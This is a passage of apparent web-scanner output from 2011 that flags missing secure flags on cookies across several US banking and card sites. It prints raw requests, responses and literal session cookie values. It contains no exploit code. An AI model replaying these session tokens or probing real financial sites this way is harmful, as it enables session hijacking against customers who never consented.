GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en"> <head> <title> American Express - Mem ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment20AMX.asp?time1= HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCQBRBBCR=MFJLFHCBMHKCEOMCNICCPKPP; path=/ Date: Thu, 03 Feb 2011 13:47:40 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /epayments/default.asp HTTP/1.1 Host: secure.thepaymentwindow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Thu, 03 Feb 2011 15:51:15 GMT X-Powered-By: ASP.NET Connection: close Content-Length: 297 Content-Type: text/html Set-Cookie: mySession=c3d8cbcb%2D179f%2D45ab%2D8d5e%2D6201d0b9c5e5; path=/epayments Cache-control: private Server: Unknown Web Server Set-Cookie: TLTSID=957CA41D4A7F550937527C8B9C274358; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ForgottenPassword.aspx HTTP/1.1 Host: securebank.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: securebank.regions.com-https=R851515607; path=/ Connection: close Date: Thu, 03 Feb 2011 15:51:16 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0)) X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=v44xql55xf30pojhjmjotu55; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 15697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML> <HEAD> <title>Regions Online Banking</title> <link href="styles/styles. ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.aspx HTTP/1.1 Host: securebank.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: securebank.regions.com-https=R929786393; path=/ Connection: close Date: Thu, 03 Feb 2011 15:51:17 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0)) X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=zcov5huv0navdtav2ahkib55; path=/ Set-Cookie: vwsli=true; path=/ Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 12024
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <HTML> <HEAD> <title>Regions Online Banking</title> <link href="styles/styles. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /main/spectrum/Home HTTP/1.1 Host: www.consumercardaccess.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 15:55:00 GMT Content-type: text/html;charset=ISO-8859-1 Cache-control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Set-cookie: JSESSIONID=03568F1802F7F86AA5F163DABD5F16ED;Path=/ Set-cookie: language=en;Path=/ Set-cookie: language=en;Path=/ Connection: close Set-Cookie: NSC_ttm-dpotvnfsdbsebddftt=ffffffffc3a0626e45525d5f4f58455e445a4a4233c1;path=/;secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ca/mkca.aspx HTTP/1.1 Host: www.morgankeegan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Connection: close Date: Thu, 03 Feb 2011 15:55:15 GMT Content-Length: 17005 Content-Type: text/html; charset=utf-8 X-Powered-By: Morgan Keegan Ingenuity X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=r0mds0551s2n1suardxkio2o; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML lang="en"> <HEAD> <title>Client Access :: Morgan Keegan</title> <META h ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /regions/ HTTP/1.1 Host: www.planservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Language: en-US Expires: 01 Nov 1990 01:00:01 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml Set-Cookie: TESTCOOKIES=Test;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/ Set-Cookie: CFID=48347521;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/ Set-Cookie: CFTOKEN=16733687;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/ Set-Cookie: JSESSIONID=0430c25d29c2403f45f2TR;path=/ Set-Cookie: PLANID=;path=/ Set-Cookie: GROUPID=;path=/ Set-Cookie: IID=;path=/ Set-Cookie: WEBUSAGE=105037;path=/ Set-Cookie: USERINTERNAL=0;path=/ Set-Cookie: VIRTDIR=regions;path=/ Date: Thu, 03 Feb 2011 15:50:36 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personal_banking.rf HTTP/1.1 Host: www.regions.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /regions/index.cfm HTTP/1.1 Host: www.sponsorinsight.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /portal/server.pt?space=CommunityPage&control=SetCommunity&PageID=0&CommunityID=305&cid=PS-PSRC-RT-BING-00033319 HTTP/1.1 Host: www.suntrust.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pt="http://www.plumtree.com/xmlschemas/ptui/"> <!-- This page uses the base page layo ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cards/benefits/ HTTP/1.1 Host: www124.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:21 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742401135944; path=/; expires=Sun, 07-Feb-16 14:13:21 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000TKqZC3FBtwwLR7ggzow9W6Y:vh7pui00;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 33942
<!-- AMU Integration Imports -->
<HTML> <HEAD> <TITLE>Credit Card Services & Benefits - Credit Card Protection | American Express</TITLE> <META name="description" content="In addition to the excl ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:19 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742099864083; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001tRlF96bogoCEk-GWeNUtldM:11m137ri1;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/DecodeServlet HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:11 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000sCj6t9Hna1rccUoRjq-IM24:10ue6mp18;Path=/ Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 0 Connection: close Content-Type: text/html Content-Language: en-US
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /secure/my-special-offers HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:16 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000I-vPqmYD-VFlGwhjjEv6j4o:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 60273
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smsweb/un_Landing.do HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0001CVQ7-fOs0FkadFJVEKHB1-6:11m1380s8; SaneID=173.193.214.243-1296742163652146; SIFR-PREFETCHED=true;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:26:17 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000sVlsrVbPIB1cvLVnVyWfqn8:11nugl6hc;Path=/ Set-Cookie: JSESSIONID=0000eNOeOQ3Hspgrd77PseRgXZw:11nugl6hc;Path=/ Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 32927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/home HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:20 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000TzQ53Y5cTtY7bAicAgzlKan:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 67227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:26 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000bW6uKYN7VFONJWqjrLhrVkp:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do?vgnextoid=2621c0f7c5a4c110VgnVCM100000defaad94RCRD&inav=footer_fraud_protection_center HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:27 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000JPI55sd8KNdx8lYTMy7brTn:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 38887
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Fraud Protection Center</title>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement&inav=footer_privacy_statement HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:29 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000WljRBDsQJbtD5N0xFge7RAb:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 55185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Internet Privacy Statement</titl ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/contactus/personalcards.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:33 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00007MfRqAecrEgPk7WMB6uziyX:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/us/en/cmaproductspage.do?vgnextoid=bbf185df62df5210VgnVCM100000defaad94RCRD&source=footer_card_agreements&inav=footer_card_agreements HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:35 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000Veb0ftG4-cYW9OOkY_veomE:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 57019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:29 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742109740701; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000F5wGIYVCO3uWBH-xeaFC48P:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openhome/smallbusiness.do?isFlash=true&inav=menu_business_openhome HTTP/1.1 Host: www257.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:37 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000akSHbW6x5an_FsyrXyIdKqc:14t0oisgo; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:37 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000pVlv_8Ac9oFOFXNUhnegkUT:15bnmhi21; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 35522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "_http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /entertainmentaccess/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:42 GMT Server: IBM_HTTP_Server Set-Cookie: ehub_JSESSIONID=0000X-wkKOi7UbYQfITKmK7Vy0B:1563unest; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 80026
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:41 GMT Server: IBM_HTTP_Server Set-Cookie: fsea_JSESSIONID=0000NxGEMtoG1S-LUW_HX7nWKW2:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 36699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-report-monitoring/enquiry.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 14:08:40 GMT Server: IBM_HTTP_Server Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US Content-Length: 0 Set-Cookie: fsea_JSESSIONID=0000DOIuP81S4K5SAYluhZy6Q1L:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html Content-Language: en-US
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/default.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/enter-password-help.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/invalidate.jsp HTTP/1.1 Host: www3.citizensbankonline.com Connection: keep-alive Referer: https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/login.jsp HTTP/1.1 Host: www3.citizensbankonline.com Connection: keep-alive Referer: https://www3.citizensbankonline.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/secure-login-help.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/wait.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The following cookie was issued by the application and does not have the secure flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:53 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /activity;src=2549153;type=initi091;cat=landi727;ord=1;num= HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://ad.doubleclick.net/activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&_dc_ck=try Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:53 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 03 Feb 2011 13:17:53 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
